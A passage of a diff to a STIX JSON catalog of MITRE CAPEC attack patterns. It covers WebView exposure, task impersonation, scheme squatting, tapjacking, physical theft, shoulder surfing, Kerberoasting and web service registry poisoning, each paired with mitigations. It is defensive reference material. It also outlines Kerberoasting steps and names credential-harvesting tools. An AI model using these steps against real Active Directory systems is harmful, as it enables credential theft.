"course-of-action--ba152037-676b-4900-8500-9e40f8772742", + "target_ref": "attack-pattern--b2e8de4b-6757-4e7e-9c5c-210c44100577", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a malicious web page, accesses application specific functionality by leveraging interfaces registered through WebView's addJavascriptInterface API. 
Once an interface is registered to WebView through addJavascriptInterface, it becomes global and all pages loaded in the WebView can call this interface.", + "external_references": [ + { + "external_id": "CAPEC-503", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/503.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Tongbo Luo, Hao Hao, Wenliang Du, Yifei Wang, Heng Yin, Attacks on WebView in the Android System, 2011, Annual Computer Security Applications Conference (ACSAC)", + "external_id": "REF-430", + "source_name": "reference_from_CAPEC", + "url": "http://www.cis.syr.edu/~wedu/Research/paper/webview_acsac2011.pdf" + } + ], + "id": "attack-pattern--c195a0a3-62fc-4def-9702-8938440cc9a7", + "modified": "2020-07-30T00:00:00.000Z", + "name": "WebView Exposure", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the adversary to convince the user to load the malicious web page inside the target application. Once loaded, the malicious web page will have the same permissions as the target application and will have access to all registered interfaces. Both the permission and the interface must be in place for the functionality to be exposed." 
+ ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, an application should limit permissions to only those required and should verify the origin of all web content it loads.", + "id": "course-of-action--89e7a7c9-d6c4-4353-adad-ee91dd8fb811", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-503-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1ba307f2-f881-482f-aff4-e2af10977631", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--89e7a7c9-d6c4-4353-adad-ee91dd8fb811", + "target_ref": "attack-pattern--c195a0a3-62fc-4def-9702-8938440cc9a7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, impersonates an expected or routine task in an attempt to steal sensitive information or leverage a user's privileges.", + "external_references": [ + { + "external_id": "CAPEC-504", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/504.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + }, + { + "description": "Masquerading: Masquerade Task or Service", + "external_id": "T1036.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/004" + }, + { + 
"description": "Adrienne Porter Felt, David Wagner, Phishing on Mobile Devices, 2011, University of California, Berkeley", + "external_id": "REF-434", + "source_name": "reference_from_CAPEC", + "url": "https://people.eecs.berkeley.edu/~daw/papers/mobphish-w2sp11.pdf" + } + ], + "id": "attack-pattern--1995c522-a25d-46e4-b024-65172771a692", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Task Impersonation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An adversary monitors the system task list for Microsoft Outlook in an attempt to determine when the application may prompt the user to enter their credentials to view encrypted email. Once the task is executed, the adversary impersonates the credential prompt to obtain the user's Microsoft Outlook encryption credentials. These credentials can then be leveraged by the adversary to read a user's encrypted email.", + "An adversary prompts a user to authorize an elevation of privileges, implying that a background task needs additional permissions to execute. The user accepts the privilege elevation, allowing the adversary to execute additional malware or tasks with the user's privileges." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine suitable tasks to exploit: Determine what tasks exist on the target system that may result in a user providing sensitive information.

  2. Techniques
    Determine what tasks prompt a user for their credentials.
    Determine what tasks may prompt a user to authorize a process to execute with elevated privileges.

Exploit

  1. Impersonate Task: Impersonate a legitimate task, either expected or unexpected, in an attempt to gain user credentials or to ride the user's privileges.

  2. Techniques
    Prompt a user for their credentials, while making the user believe the credential request is legitimate.
    Prompt a user to authorize a task to run with elevated privileges, while making the user believe the request is legitimate.
", + "x_capec_extended_description": "\n When impersonating an expected task, the adversary monitors the task list maintained by the operating system and waits for a specific legitimate task to become active. Once the task is detected, the malicious application launches a new task in the foreground that mimics the user interface of the legitimate task. At this point, the user thinks that they are interacting with the legitimate task that they started, but instead they are interacting with the malicious application. Once the adversary's goal is reached, the malicious application can exit, leaving the original trusted application visible and the appearance that nothing out of the ordinary has occurred.\n A second approach entails the adversary impersonating an unexpected task, but one that may often be spawned by legitimate background processes. For example, an adversary may randomly impersonate a system credential prompt, implying that a background process requires authentication for some purpose. The user, believing they are interacting with a legitimate task, enters their credentials or authorizes the use of their stored credentials, which the adversary then leverages for nefarious purposes. This type of attack is most often used to obtain sensitive information (e.g., credentials) from the user, but may also be used to ride the user's privileges.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--f7a0e7bd-d24a-4390-b365-9e71f22e4e06" + ], + "x_capec_prerequisites": [ + "The adversary must already have access to the target system via some means.", + "A legitimate task must exist that an adversary can impersonate to glean credentials.", + "The user's privileges allow them to execute certain tasks with elevated privileges." + ], + "x_capec_resources_required": [ + "Malware or some other means to initially comprise the target system.", + "Additional malware to impersonate a legitimate task." 
+ ], + "x_capec_skills_required": { + "Low": "Once an adversary has gained access to the target system, impersonating a task is trivial." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The only known mitigation to this attack is to avoid installing the malicious application on the device. However, to impersonate a running task the malicious application does need the GET_TASKS permission to be able to query the task list, and being suspicious of applications with that permission can help.", + "id": "course-of-action--c40d7d86-ab26-4e1a-9b9b-e3496f0f36fc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-504-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3528ad55-1737-4d7b-b627-6716bbe22c84", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c40d7d86-ab26-4e1a-9b9b-e3496f0f36fc", + "target_ref": "attack-pattern--1995c522-a25d-46e4-b024-65172771a692", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, registers for a URL scheme intended for a target application that has not been installed. Thereafter, messages intended for the target application are handled by the malicious application. 
Upon receiving a message, the malicious application displays a screen that mimics the target application, thereby convincing the user to enter sensitive information. This type of attack is most often used to obtain sensitive information (e.g., credentials) from the user as they think that they are interacting with the intended target application.", + "external_references": [ + { + "external_id": "CAPEC-505", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/505.html" + }, + { + "description": "Adrienne Porter Felt, David Wagner, Phishing on Mobile Devices, 2011, University of California, Berkeley", + "external_id": "REF-434", + "source_name": "reference_from_CAPEC", + "url": "https://people.eecs.berkeley.edu/~daw/papers/mobphish-w2sp11.pdf" + } + ], + "id": "attack-pattern--ef205569-ee34-491a-b773-5c023e2c1680", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Scheme Squatting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The only known mitigation to this attack is to avoid installing the malicious application on the device. 
Applications usually have to declare the schemes they wish to register, so detecting this during a review is feasible.", + "id": "course-of-action--f74b7999-9f3c-4cda-82d5-a40b0620f072", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-505-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--39c2732f-5fa7-44ba-9dab-86cc03c05888", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f74b7999-9f3c-4cda-82d5-a40b0620f072", + "target_ref": "attack-pattern--ef205569-ee34-491a-b773-5c023e2c1680", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, displays an interface that misleads the user and convinces them to tap on an attacker desired location on the screen. This is often accomplished by overlaying one screen on top of another while giving the appearance of a single interface. There are two main techniques used to accomplish this. The first is to leverage transparent properties that allow taps on the screen to pass through the visible application to an application running in the background. The second is to strategically place a small object (e.g., a button or text field) on top of the visible screen and make it appear to be a part of the underlying application. 
In both cases, the user is convinced to tap on the screen but does not realize the application that they are interacting with.", + "external_references": [ + { + "external_id": "CAPEC-506", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/506.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + }, + { + "description": "Marcus Niemietz, Jorg Schwenk, UI Redressing Attacks on Android Devices, 2012, Horst Gortz Institute for IT-Security", + "external_id": "REF-436", + "source_name": "reference_from_CAPEC", + "url": "https://media.blackhat.com/ad-12/Niemietz/bh-ad-12-androidmarcus_niemietz-WP.pdf" + }, + { + "description": "David Richardson, Look-10-007 - Tapjacking, 2010, Lookout Mobile Security", + "external_id": "REF-437", + "source_name": "reference_from_CAPEC", + "url": "https://blog.lookout.com/look-10-007-tapjacking/" + } + ], + "id": "attack-pattern--79309efd-dd13-41d2-81c6-ec382bced2b4", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Tapjacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "This pattern of attack requires the ability to execute a malicious application on the user's device. This malicious application is used to present the interface to the user and make the attack possible." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary gains physical access to a system or device through theft of the item. 
Possession of a system or device enables a number of unique attacks to be executed and often provides the adversary with an extended timeframe for which to perform an attack. Most protections put in place to secure sensitive information can be defeated when an adversary has physical access and enough time.", + "external_references": [ + { + "external_id": "CAPEC-507", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/507.html" + } + ], + "id": "attack-pattern--debee1d7-930b-4daa-90e0-850d41c80cbd", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Physical Theft", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_prerequisites": [ + "This type of attack requires the existence of a physical target that an adversary believes hosts something of value." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of attack, physical security techniques such as locks doors, alarms, and monitoring of targets should be implemented.", + "id": "course-of-action--a86bd9f5-9786-4d89-8d08-8c26d32b9178", + "modified": "2014-06-23T00:00:00.000Z", + "name": "coa-507-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--150a1d7c-14ac-46f7-9e73-619a5595c6db", + "modified": "2014-06-23T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--a86bd9f5-9786-4d89-8d08-8c26d32b9178", + "target_ref": "attack-pattern--debee1d7-930b-4daa-90e0-850d41c80cbd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In a shoulder surfing attack, an adversary observes an unaware individual's keystrokes, screen content, or conversations with the goal of obtaining sensitive information. One motive for this attack is to obtain sensitive information about the target for financial, personal, political, or other gains. From an insider threat perspective, an additional motive could be to obtain system/application credentials or cryptographic keys. Shoulder surfing attacks are accomplished by observing the content \"over the victim's shoulder\", as implied by the name of this attack.", + "external_references": [ + { + "external_id": "CAPEC-508", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/508.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "external_id": "CWE-359", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/359.html" + } + ], + "id": "attack-pattern--a4986dd8-cb9c-45cb-bb53-b7549f2b8d62", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Shoulder Surfing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_example_instances": [ + "An adversary can capture a target's banking credentials and transfer 
money to adversary-controlled accounts.", + "An adversary observes the target's mobile device lock screen pattern/passcode and then steals the device, which can now be unlocked.", + "An insider could obtain database credentials for an application and sell the credentials on the black market.", + "An insider overhears a conversation pertaining to classified information, which could then be posted on an anonymous online forum." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary typically requires physical proximity to the target's environment, in order to observe their screen or conversation. This may not be the case if the adversary is able to record the target and obtain sensitive information upon review of the recording." + ], + "x_capec_skills_required": { + "Low": "In most cases, an adversary can simply observe and retain the desired information." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Be mindful of your surroundings when discussing or viewing sensitive information in public areas.", + "id": "course-of-action--d898b88c-d850-4a06-bd12-57de9ee9c1e2", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-508-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--190133dc-952f-4cbc-864c-a85cc28a04fe", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d898b88c-d850-4a06-bd12-57de9ee9c1e2", + "target_ref": 
"attack-pattern--a4986dd8-cb9c-45cb-bb53-b7549f2b8d62", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Pertaining to insider threats, ensure that sensitive information is not displayed to nor discussed around individuals without need-to-know access to said information.", + "id": "course-of-action--41704dad-06e1-4a59-9ab2-94b25763a063", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-508-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c24c04d4-0e8d-43c3-bd68-829df5ceff0a", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--41704dad-06e1-4a59-9ab2-94b25763a063", + "target_ref": "attack-pattern--a4986dd8-cb9c-45cb-bb53-b7549f2b8d62", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Through the exploitation of how service accounts leverage Kerberos authentication with Service Principal Names (SPNs), the adversary obtains and subsequently cracks the hashed credentials of a service account target to exploit its privileges. The Kerberos authentication protocol centers around a ticketing system which is used to request/grant access to services and to then access the requested services. As an authenticated user, the adversary may request Active Directory and obtain a service ticket with portions encrypted via RC4 with the private key of the authenticated account. 
By extracting the local ticket and saving it disk, the adversary can brute force the hashed value to reveal the target account credentials.", + "external_references": [ + { + "external_id": "CAPEC-509", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/509.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "description": "Steal or Forge Kerberos Tickets:Kerberoasting", + "external_id": "T1558.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1558/003" + }, + { + "description": "Jeff Warren, Extracting Service Account Passwords with Kerberoasting, 2017--05---09", + "external_id": "REF-559", + "source_name": "reference_from_CAPEC", + "url": "https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/" + }, + { + "description": "Kerberoasting Without Mimikatz, 2016--11---01", + "external_id": "REF-585", + "source_name": "reference_from_CAPEC", + "url": "https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/" + }, + { + "description": "Invoke-Kerberoast", + "external_id": "REF-586", + "source_name": "reference_from_CAPEC", + "url": 
"https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/" + } + ], + "id": "attack-pattern--9197c7a2-6a03-40da-b2a6-df5f1d69e8fb", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Kerberoasting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "PowerSploit's Invoke-Kerberoast module can be leveraged to request Ticket Granting Service (TGS) tickets and return crackable ticket hashes. [REF-585] [REF-586]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Scan for user accounts with set SPN values

  2. Techniques
    These can be found via Powershell or LDAP queries, as well as enumerating startup name accounts and other means.
  3. Request service tickets

  4. Techniques
    Using user account's SPN value, request other service tickets from Active Directory

Experiment

  1. Extract ticket and save to disk

  2. Techniques
    Certain tools like Mimikatz can extract local tickets and save them to memory/disk.

Exploit

  1. Crack the encrypted ticket to harvest plain text credentials

  2. Techniques
    Leverage a brute force application/script on the hashed value offline until cracked. The shorter the password, the easier it is to crack.
", + "x_capec_prerequisites": [ + "The adversary requires access as an authenticated user on the system. This attack pattern relates to elevating privileges.", + "The adversary requires use of a third-party credential harvesting tool (e.g., Mimikatz).", + "The adversary requires a brute force tool." + ], + "x_capec_skills_required": { + "Medium": "" + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor system and domain logs for abnormal access.", + "id": "course-of-action--0257f904-bcb7-445e-9ef7-f9d294e49f67", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-509-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--445d759f-d21c-4325-a510-bd6e24de839d", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0257f904-bcb7-445e-9ef7-f9d294e49f67", + "target_ref": "attack-pattern--9197c7a2-6a03-40da-b2a6-df5f1d69e8fb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ a robust password policy for service accounts. 
Passwords should be of adequate length and complexity, and they should expire after a period of time.", + "id": "course-of-action--523888c0-0594-4b49-a1f3-c0cccdcec0eb", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-509-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b2a47d13-bffb-4f8b-94f6-aeeb94afc153", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--523888c0-0594-4b49-a1f3-c0cccdcec0eb", + "target_ref": "attack-pattern--9197c7a2-6a03-40da-b2a6-df5f1d69e8fb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ the principle of least privilege: limit service accounts privileges to what is required for functionality and no more.", + "id": "course-of-action--7659d2c2-f9c5-4599-8c79-7d29ae80e31c", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-509-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a8893293-d02b-4ee1-9f85-56386750d82f", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7659d2c2-f9c5-4599-8c79-7d29ae80e31c", + "target_ref": "attack-pattern--9197c7a2-6a03-40da-b2a6-df5f1d69e8fb", + "type": 
"relationship", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Enable AES Kerberos encryption (or another stronger encryption algorithm), rather than RC4, where possible.", + "id": "course-of-action--566e2dfe-a0ce-4bcb-8e9d-2fa5450391dc", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-509-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2019-04-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ee90edd2-2b62-435a-9e2e-f24f212d13ba", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--566e2dfe-a0ce-4bcb-8e9d-2fa5450391dc", + "target_ref": "attack-pattern--9197c7a2-6a03-40da-b2a6-df5f1d69e8fb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "SOA and Web Services often use a registry to perform look up, get schema information, and metadata about services. 
A poisoned registry can redirect (think phishing for servers) the service requester to a malicious service provider, provide incorrect information in schema or metadata, and delete information about service provider interfaces.", + "external_references": [ + { + "external_id": "CAPEC-51", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/51.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + } + ], + "id": "attack-pattern--943fa8f4-b777-4f3c-984b-9f620e50c70b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Poison Web Service Registry", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e283aef8-250b-4ac9-bf8b-34a6a70ed2f4" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n WS-Addressing provides location and metadata about the service endpoints. An extremely hard to detect attack is an attacker who updates the WS-Addressing header, leaves the standard service request and service provider addressing and header information intact, but adds an additional WS-Addressing Replyto header. In this case the attacker is able to send a copy (like a cc in mail) of every result the service provider generates. 
